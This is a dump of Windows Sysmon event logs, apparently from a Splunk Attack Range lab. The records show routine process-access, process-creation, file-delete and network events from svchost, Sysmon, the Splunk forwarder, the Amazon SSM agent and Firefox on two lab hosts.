07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083026Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083025Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083024Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083023Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083022Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083021Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083020Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083019Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083018Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B466-615A-8401-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083017Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.492{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B466-615A-8401-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083016Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.493{2FDD8D40-B466-615A-8401-00000000FD01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083015Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.195{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=705967EC0C2DF3F2391856460B5D33FC,SHA256=ECCE0F6D0CE138B585CA044C0E1648CB8562EB4C0F1F04B16E9CA1D3027D4F03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:34.637{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a16469|C:\Program Files\Mozilla Firefox\xul.dll+a1638a|C:\Program Files\Mozilla Firefox\xul.dll+a15f79|C:\Program Files\Mozilla Firefox\xul.dll+a120ff|C:\Program Files\Mozilla Firefox\xul.dll+a1240c|C:\Program Files\Mozilla Firefox\xul.dll+b5f98a|C:\Program Files\Mozilla Firefox\xul.dll+2dbf19|C:\Program Files\Mozilla Firefox\xul.dll+2dbe24|C:\Program Files\Mozilla Firefox\xul.dll+2dbc0d|C:\Program Files\Mozilla Firefox\xul.dll+2dbaa4|C:\Program Files\Mozilla Firefox\xul.dll+bab3e3|C:\Program Files\Mozilla Firefox\xul.dll+bac0d1|C:\Program Files\Mozilla Firefox\xul.dll+bab0dd|C:\Program Files\Mozilla Firefox\xul.dll+bab032|C:\Program Files\Mozilla Firefox\xul.dll+b7c131|C:\Program Files\Mozilla Firefox\xul.dll+1a25c2a|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a 354300x8000000000000000106609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:32.476{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51848-false10.0.1.12-8000- 23542300x8000000000000000106608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:34.525{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-031MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083014Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:34.101{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28F35C824628B00622CC297BAAA33028,SHA256=7FF428773272273FD207F00FB7362EC8DF78A030706FA99F5722B12DA2B1996B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106614Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:59:35.668{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B4CA86908FC4B0C6C260C5E1553845F,SHA256=7712771BD3FB965BFAE274FB7B74324191F3BA328FAC34777C840288C112C049,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083045Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.664{2FDD8D40-B467-615A-8501-00000000FD01}24281868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083044Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B467-615A-8501-00000000FD01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083043Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083042Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083041Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083040Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083039Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083038Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083037Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083036Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:59:35.523{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083035Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 